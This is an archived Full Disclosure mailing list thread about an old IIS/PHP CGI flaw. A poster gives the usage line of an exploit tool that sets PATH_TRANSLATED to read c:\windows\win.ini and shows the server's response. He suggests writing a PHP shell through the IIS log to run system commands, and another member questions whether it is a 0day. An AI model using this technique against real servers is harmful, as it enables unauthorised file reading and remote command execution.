Full Disclosure mailing list archives
Re: iis cgi 0day
From: yuange <yuange1975 () hotmail com>
Date: Thu, 10 Apr 2014 02:25:45 +0000
Discovered in 2000 for IIS4\IIS5 0day.

.php -> php.exe

the exploit file ver 4.1.1 .

http://seclists.org/fulldisclosure/2012/Apr/13

usage:

iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini yuan can get the file c:\windows\win.ini

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 10 Apr 2014 02:11:37 GMT
Connection: close
X-Powered-By: PHP/4.0.0
Content-type: text/html

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
ivf=MPEGVideo
m3u=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpv2=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wvx=MPEGVideo
[SciCalc]
layout=0

You can use the IIS log file write phpshell, execute the PHP call system cmd.

Date: Wed, 9 Apr 2014 23:11:28 +0300
From: kirils.solovjovs () kirils com
To: yuange1975 () hotmail com
Subject: Re: [FD] iis cgi 0day

Sorry, I don't read Chinese. How is this a 0day?

--
Kirils Solovjovs

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/